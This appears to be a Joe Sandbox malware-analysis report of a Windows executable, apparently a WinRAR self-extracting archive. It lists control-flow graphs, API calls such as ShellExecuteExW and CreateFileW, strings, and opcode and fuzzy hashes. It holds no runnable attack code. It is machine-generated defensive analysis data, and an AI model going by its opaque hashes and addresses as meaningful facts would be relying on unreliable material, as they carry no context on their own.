                                                                                        control_flow_graph 1988 7ff70e7af4e0-7ff70e7af523 1989 7ff70e7af894-7ff70e7af8b9 call 7ff70e781fa0 call 7ff70e7b2320 1988->1989 1990 7ff70e7af529-7ff70e7af565 call 7ff70e7b3cf0 1988->1990 1996 7ff70e7af56a-7ff70e7af571 1990->1996 1997 7ff70e7af567 1990->1997 1999 7ff70e7af582-7ff70e7af586 1996->1999 2000 7ff70e7af573-7ff70e7af577 1996->2000 1997->1996 2003 7ff70e7af588 1999->2003 2004 7ff70e7af58b-7ff70e7af596 1999->2004 2001 7ff70e7af579 2000->2001 2002 7ff70e7af57c-7ff70e7af580 2000->2002 2001->2002 2002->2004 2003->2004 2005 7ff70e7af628 2004->2005 2006 7ff70e7af59c 2004->2006 2007 7ff70e7af62c-7ff70e7af62f 2005->2007 2008 7ff70e7af5a2-7ff70e7af5a9 2006->2008 2011 7ff70e7af631-7ff70e7af635 2007->2011 2012 7ff70e7af637-7ff70e7af63a 2007->2012 2009 7ff70e7af5ae-7ff70e7af5b3 2008->2009 2010 7ff70e7af5ab 2008->2010 2013 7ff70e7af5e5-7ff70e7af5f0 2009->2013 2014 7ff70e7af5b5 2009->2014 2010->2009 2011->2012 2015 7ff70e7af660-7ff70e7af673 call 7ff70e7963ac 2011->2015 2012->2015 2016 7ff70e7af63c-7ff70e7af643 2012->2016 2020 7ff70e7af5f2 2013->2020 2021 7ff70e7af5f5-7ff70e7af5fa 2013->2021 2017 7ff70e7af5ca-7ff70e7af5d0 2014->2017 2031 7ff70e7af675-7ff70e7af693 call 7ff70e7a13c4 2015->2031 2032 7ff70e7af698-7ff70e7af6ed call 7ff70e7b797c call 7ff70e78129c call 7ff70e7932a8 call 7ff70e781fa0 2015->2032 2016->2015 2018 7ff70e7af645-7ff70e7af65c 2016->2018 2022 7ff70e7af5d2 2017->2022 2023 7ff70e7af5b7-7ff70e7af5be 2017->2023 2018->2015 2020->2021 2025 7ff70e7af600-7ff70e7af607 2021->2025 2026 7ff70e7af8ba-7ff70e7af8c1 2021->2026 2022->2013 2027 7ff70e7af5c0 2023->2027 2028 7ff70e7af5c3-7ff70e7af5c8 2023->2028 2033 7ff70e7af609 2025->2033 2034 7ff70e7af60c-7ff70e7af612 2025->2034 2029 7ff70e7af8c6-7ff70e7af8cb 2026->2029 2030 7ff70e7af8c3 2026->2030 2027->2028 2028->2017 2036 7ff70e7af5d4-7ff70e7af5db 2028->2036 2037 7ff70e7af8cd-7ff70e7af8d4 2029->2037 2038 7ff70e7af8de-7ff70e7af8e6 2029->2038 2030->2029 2031->2032 2055 7ff70e7af742-7ff70e7af74f ShellExecuteExW 2032->2055 2056 7ff70e7af6ef-7ff70e7af73d call 7ff70e7b797c call 7ff70e78129c call 7ff70e795b60 call 7ff70e781fa0 2032->2056 2033->2034 2034->2026 2035 7ff70e7af618-7ff70e7af622 2034->2035 2035->2005 2035->2008 2042 7ff70e7af5e0 2036->2042 2043 7ff70e7af5dd 2036->2043 2044 7ff70e7af8d6 2037->2044 2045 7ff70e7af8d9 2037->2045 2046 7ff70e7af8e8 2038->2046 2047 7ff70e7af8eb-7ff70e7af8f6 2038->2047 2042->2013 2043->2042 2044->2045 2045->2038 2046->2047 2047->2007 2057 7ff70e7af755-7ff70e7af75f 2055->2057 2058 7ff70e7af846-7ff70e7af84e 2055->2058 2056->2055 2060 7ff70e7af761-7ff70e7af764 2057->2060 2061 7ff70e7af76f-7ff70e7af772 2057->2061 2063 7ff70e7af882-7ff70e7af88f 2058->2063 2064 7ff70e7af850-7ff70e7af866 2058->2064 2060->2061 2065 7ff70e7af766-7ff70e7af76d 2060->2065 2066 7ff70e7af774-7ff70e7af77f call 7ff70e7ee188 2061->2066 2067 7ff70e7af78e-7ff70e7af7ad call 7ff70e7ee1b8 call 7ff70e7afe24 2061->2067 2063->1989 2069 7ff70e7af868-7ff70e7af87b 2064->2069 2070 7ff70e7af87d call 7ff70e7b220c 2064->2070 2065->2061 2071 7ff70e7af7e3-7ff70e7af7f0 CloseHandle 2065->2071 2066->2067 2087 7ff70e7af781-7ff70e7af78c ShowWindow 2066->2087 2067->2071 2096 7ff70e7af7af-7ff70e7af7b2 2067->2096 2069->2070 2075 7ff70e7af8fb-7ff70e7af903 call 7ff70e7b7904 2069->2075 2070->2063 2078 7ff70e7af7f2-7ff70e7af803 call 7ff70e7a13c4 2071->2078 2079 7ff70e7af805-7ff70e7af80c 2071->2079 2078->2079 2085 7ff70e7af82e-7ff70e7af830 2078->2085 2079->2085 2086 7ff70e7af80e-7ff70e7af811 2079->2086 2085->2058 2092 7ff70e7af832-7ff70e7af835 2085->2092 2086->2085 2091 7ff70e7af813-7ff70e7af828 2086->2091 2087->2067 2091->2085 2092->2058 2095 7ff70e7af837-7ff70e7af845 ShowWindow 2092->2095 2095->2058 2096->2071 2098 7ff70e7af7b4-7ff70e7af7c5 GetExitCodeProcess 2096->2098 2098->2071 2099 7ff70e7af7c7-7ff70e7af7dc 2098->2099 2099->2071
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                                        • String ID: .exe$.inf$Install$p
                                                                                        • API String ID: 1054546013-3607691742
                                                                                        • Opcode ID: 6e56b012281178d840e256ad45ed2bf74d7a60ef72c69255f0e18c76dd578e91
                                                                                        • Instruction ID: d3558c9626c71faa054e38144a44d15233f50f781adcf8273ec4afbe00eb54c0
                                                                                        • Opcode Fuzzy Hash: 6e56b012281178d840e256ad45ed2bf74d7a60ef72c69255f0e18c76dd578e91
                                                                                        • Instruction Fuzzy Hash: 31C17C22F09A0295FB18EB25DD44279B3B1AFCDB84F886036DA4D477A5DF3CE4958320

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3569833718-0
                                                                                        • Opcode ID: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                                                        • Instruction ID: 76d4db80d9274e5be0fb76b05f9aeda0b9aee45992e5cdd8eb53cb57fdf8c77b
                                                                                        • Opcode Fuzzy Hash: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                                                        • Instruction Fuzzy Hash: 7C419A21B14A4286F714AF61EC10BAE7360EF8DB9CF842535DD0A07B95CF3DE4498764

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2675 7ff70e7aa440-7ff70e7aa479 2676 7ff70e7aa47f-7ff70e7aa56e call 7ff70e7acdf8 call 7ff70e7b797c call 7ff70e78129c call 7ff70e7b797c call 7ff70e78129c call 7ff70e7b797c call 7ff70e78129c call 7ff70e7aa834 2675->2676 2677 7ff70e7aa70b-7ff70e7aa72e call 7ff70e7b2320 2675->2677 2695 7ff70e7aa573-7ff70e7aa575 2676->2695 2696 7ff70e7aa577-7ff70e7aa57b 2695->2696 2697 7ff70e7aa57d 2695->2697 2696->2697 2698 7ff70e7aa580-7ff70e7aa58d 2696->2698 2697->2698 2699 7ff70e7aa5c1-7ff70e7aa5db 2698->2699 2700 7ff70e7aa58f-7ff70e7aa5a1 2698->2700 2701 7ff70e7aa60f-7ff70e7aa629 2699->2701 2702 7ff70e7aa5dd-7ff70e7aa5ef 2699->2702 2703 7ff70e7aa5a3-7ff70e7aa5b6 2700->2703 2704 7ff70e7aa5bc call 7ff70e7b220c 2700->2704 2708 7ff70e7aa65d-7ff70e7aa660 2701->2708 2709 7ff70e7aa62b-7ff70e7aa63d 2701->2709 2706 7ff70e7aa5f1-7ff70e7aa604 2702->2706 2707 7ff70e7aa60a call 7ff70e7b220c 2702->2707 2703->2704 2710 7ff70e7aa735-7ff70e7aa73a call 7ff70e7b7904 2703->2710 2704->2699 2706->2707 2712 7ff70e7aa73b-7ff70e7aa740 call 7ff70e7b7904 2706->2712 2707->2701 2716 7ff70e7aa662-7ff70e7aa669 2708->2716 2717 7ff70e7aa686-7ff70e7aa68e 2708->2717 2714 7ff70e7aa63f-7ff70e7aa652 2709->2714 2715 7ff70e7aa658 call 7ff70e7b220c 2709->2715 2710->2712 2722 7ff70e7aa741-7ff70e7aa746 call 7ff70e7b7904 2712->2722 2714->2715 2714->2722 2715->2708 2716->2717 2724 7ff70e7aa66b-7ff70e7aa685 call 7ff70e7820b0 2716->2724 2718 7ff70e7aa6c2-7ff70e7aa6db 2717->2718 2719 7ff70e7aa690-7ff70e7aa6a2 2717->2719 2718->2677 2728 7ff70e7aa6dd-7ff70e7aa6ef 2718->2728 2725 7ff70e7aa6a4-7ff70e7aa6b7 2719->2725 2726 7ff70e7aa6bd call 7ff70e7b220c 2719->2726 2731 7ff70e7aa747-7ff70e7aa797 call 7ff70e7b7904 call 7ff70e78255c 2722->2731 2724->2717 2725->2726 2725->2731 2726->2718 2733 7ff70e7aa6f1-7ff70e7aa704 2728->2733 2734 7ff70e7aa706 call 7ff70e7b220c 2728->2734 2745 7ff70e7aa812 2731->2745 2746 7ff70e7aa799-7ff70e7aa79f 2731->2746 2733->2734 2737 7ff70e7aa72f-7ff70e7aa734 call 7ff70e7b7904 2733->2737 2734->2677 2737->2710 2747 7ff70e7aa817-7ff70e7aa832 call 7ff70e7b2320 2745->2747 2748 7ff70e7aa801-7ff70e7aa80c SetDlgItemTextW 2746->2748 2749 7ff70e7aa7a1-7ff70e7aa7a4 2746->2749 2748->2745 2750 7ff70e7aa7b1-7ff70e7aa7b3 2749->2750 2751 7ff70e7aa7a6-7ff70e7aa7ab 2749->2751 2750->2747 2754 7ff70e7aa7c2-7ff70e7aa7ff call 7ff70e7ee170 call 7ff70e79bb00 call 7ff70e79bb70 2751->2754 2755 7ff70e7aa7ad-7ff70e7aa7af 2751->2755 2758 7ff70e7aa7b7-7ff70e7aa7c0 EndDialog 2754->2758 2755->2750 2756 7ff70e7aa7b5 2755->2756 2756->2758 2758->2745
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialogOpen
                                                                                        • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                        • API String ID: 2300675366-1315819833
                                                                                        • Opcode ID: d8322a208530c57668d9ab0bd9eeb9a998ed53718cd7cec1bf797515a4396991
                                                                                        • Instruction ID: 1b9ff76800a125e011e99cc161af0ca86dabc2fb96d5e6feb01adb76ee821309
                                                                                        • Opcode Fuzzy Hash: d8322a208530c57668d9ab0bd9eeb9a998ed53718cd7cec1bf797515a4396991
                                                                                        • Instruction Fuzzy Hash: 7CB1C162F1978285FB00EB64D8443BDA372AF89794F846236DA5C27AD9EF3CE445C310
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: 62b60af2f7a88576df12e3db194ad19acd1e3759869934ce613b8f4ca490e85a
                                                                                        • Instruction ID: d25db70b5121c76c4734ade200aa41f36477e0b0a4af1f14e4ad05b7e37b2157
                                                                                        • Opcode Fuzzy Hash: 62b60af2f7a88576df12e3db194ad19acd1e3759869934ce613b8f4ca490e85a
                                                                                        • Instruction Fuzzy Hash: BB12E362F58B4584FB14EB65D9442BDA371EF587A8F802232DA5C17AEADF3CD486C310

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 3907 7ff70e7924c0-7ff70e7924fb 3908 7ff70e792506 3907->3908 3909 7ff70e7924fd-7ff70e792504 3907->3909 3910 7ff70e792509-7ff70e792578 3908->3910 3909->3908 3909->3910 3911 7ff70e79257a 3910->3911 3912 7ff70e79257d-7ff70e7925a8 CreateFileW 3910->3912 3911->3912 3913 7ff70e792688-7ff70e79268d 3912->3913 3914 7ff70e7925ae-7ff70e7925de GetLastError call 7ff70e796a0c 3912->3914 3916 7ff70e792693-7ff70e792697 3913->3916 3920 7ff70e7925e0-7ff70e79262a CreateFileW GetLastError 3914->3920 3921 7ff70e79262c 3914->3921 3918 7ff70e7926a5-7ff70e7926a9 3916->3918 3919 7ff70e792699-7ff70e79269c 3916->3919 3923 7ff70e7926cf-7ff70e7926e3 3918->3923 3924 7ff70e7926ab-7ff70e7926af 3918->3924 3919->3918 3922 7ff70e79269e 3919->3922 3928 7ff70e792632-7ff70e79263a 3920->3928 3921->3928 3922->3918 3926 7ff70e7926e5-7ff70e7926f0 3923->3926 3927 7ff70e79270c-7ff70e792735 call 7ff70e7b2320 3923->3927 3924->3923 3925 7ff70e7926b1-7ff70e7926c9 SetFileTime 3924->3925 3925->3923 3929 7ff70e7926f2-7ff70e7926fa 3926->3929 3930 7ff70e792708 3926->3930 3931 7ff70e792673-7ff70e792686 3928->3931 3932 7ff70e79263c-7ff70e792653 3928->3932 3934 7ff70e7926ff-7ff70e792703 call 7ff70e7820b0 3929->3934 3935 7ff70e7926fc 3929->3935 3930->3927 3931->3916 3936 7ff70e792655-7ff70e792668 3932->3936 3937 7ff70e79266e call 7ff70e7b220c 3932->3937 3934->3930 3935->3934 3936->3937 3940 7ff70e792736-7ff70e79273b call 7ff70e7b7904 3936->3940 3937->3931
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3536497005-0
                                                                                        • Opcode ID: dc46ff84bd0c57c9ac2b9914d0228e8f14f7433d989622a2074281460ea8d587
                                                                                        • Instruction ID: e30e000add779d0add1649b521219a7e665267ad9e606432867c935225070b1a
                                                                                        • Opcode Fuzzy Hash: dc46ff84bd0c57c9ac2b9914d0228e8f14f7433d989622a2074281460ea8d587
                                                                                        • Instruction Fuzzy Hash: 3C61D966A1868145E714AB29F90036EA7B1FF887B8F502334DFAD03AE9DF3DD0948754

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateValue_invalid_parameter_noinfo_noreturn
                                                                                        • String ID: Software\WinRAR SFX
                                                                                        • API String ID: 207320342-754673328
                                                                                        • Opcode ID: 83cc995b7a56d11fe18315dcab67657edd613bff7608f24d2fbf991acf9cacb4
                                                                                        • Instruction ID: 47a47f50cb19081c04b6665d9965a5769563e1fa509b992a2a2fe918ccbb5128
                                                                                        • Opcode Fuzzy Hash: 83cc995b7a56d11fe18315dcab67657edd613bff7608f24d2fbf991acf9cacb4
                                                                                        • Instruction Fuzzy Hash: 30417132604A4289EB14EF34E8547A9B3A5FF8C798F842635EA5C43B98DF3CD194C710

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                                                                        • String ID: ]
                                                                                        • API String ID: 3561356813-3352871620
                                                                                        • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                        • Instruction ID: a3f7ca956db12d91c200152e0c8e1d49a266d011d39418ee724649a127fd3ebc
                                                                                        • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                        • Instruction Fuzzy Hash: D5116321B0D64242FA64BB21FA54279E291AFCCBC4F8C2434D95D07B9AEF3DE8058621

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 1266772231-0
                                                                                        • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                        • Instruction ID: a9c5cb15929bac88dbd191e07a1424f0f24516d5079b4892aaba1f51d2aaa500
                                                                                        • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                        • Instruction Fuzzy Hash: 9DF0EC25A3854282FB50AB20EC95A36B361FFDC709FC46835E64E41954DF3CD548CB11

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                        • String ID: EDIT
                                                                                        • API String ID: 4243998846-3080729518
                                                                                        • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                        • Instruction ID: 849bd98726c5d6a47c1cd1e1381a1df6d0e6128c45256236070ee6442302c39f
                                                                                        • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                        • Instruction Fuzzy Hash: 38014F61A18A4781FA20AB21FC103A5A395AFDC744FC82031CA4D06695EF3CD199C660

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 4292 7ff70e792ce0-7ff70e792d0a 4293 7ff70e792d13-7ff70e792d1b 4292->4293 4294 7ff70e792d0c-7ff70e792d0e 4292->4294 4296 7ff70e792d2b 4293->4296 4297 7ff70e792d1d-7ff70e792d28 GetStdHandle 4293->4297 4295 7ff70e792ea9-7ff70e792ec4 call 7ff70e7b2320 4294->4295 4299 7ff70e792d31-7ff70e792d3d 4296->4299 4297->4296 4301 7ff70e792d3f-7ff70e792d44 4299->4301 4302 7ff70e792d86-7ff70e792da2 WriteFile 4299->4302 4303 7ff70e792daf-7ff70e792db3 4301->4303 4304 7ff70e792d46-7ff70e792d7a WriteFile 4301->4304 4305 7ff70e792da6-7ff70e792da9 4302->4305 4307 7ff70e792ea2-7ff70e792ea6 4303->4307 4308 7ff70e792db9-7ff70e792dbd 4303->4308 4304->4305 4306 7ff70e792d7c-7ff70e792d82 4304->4306 4305->4303 4305->4307 4306->4304 4309 7ff70e792d84 4306->4309 4307->4295 4308->4307 4310 7ff70e792dc3-7ff70e792dd8 call 7ff70e78b4f8 4308->4310 4309->4305 4313 7ff70e792dda-7ff70e792de1 4310->4313 4314 7ff70e792e1e-7ff70e792e6d call 7ff70e7b797c call 7ff70e78129c call 7ff70e78bca8 4310->4314 4313->4299 4315 7ff70e792de7-7ff70e792de9 4313->4315 4314->4307 4325 7ff70e792e6f-7ff70e792e86 4314->4325 4315->4299 4317 7ff70e792def-7ff70e792e19 4315->4317 4317->4299 4326 7ff70e792e88-7ff70e792e9b 4325->4326 4327 7ff70e792e9d call 7ff70e7b220c 4325->4327 4326->4327 4328 7ff70e792ec5-7ff70e792ecb call 7ff70e7b7904 4326->4328 4327->4307
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$Handle
                                                                                        • String ID:
                                                                                        • API String ID: 4209713984-0
                                                                                        • Opcode ID: 759593f06e971a5af3dff942057e3884964648b854c35b3f90eb8150d1d2c130
                                                                                        • Instruction ID: b0d51b720fe4006616b33f34e5f3e0958e06aabd3d79dbfa8bc1325288c451cd
                                                                                        • Opcode Fuzzy Hash: 759593f06e971a5af3dff942057e3884964648b854c35b3f90eb8150d1d2c130
                                                                                        • Instruction Fuzzy Hash: FF512622B1968292FB54FB35EC4477AA360FF48B94F802135EA4D07AA5DF3CE485C320
                                                                                        APIs
                                                                                        Memory Dump Source
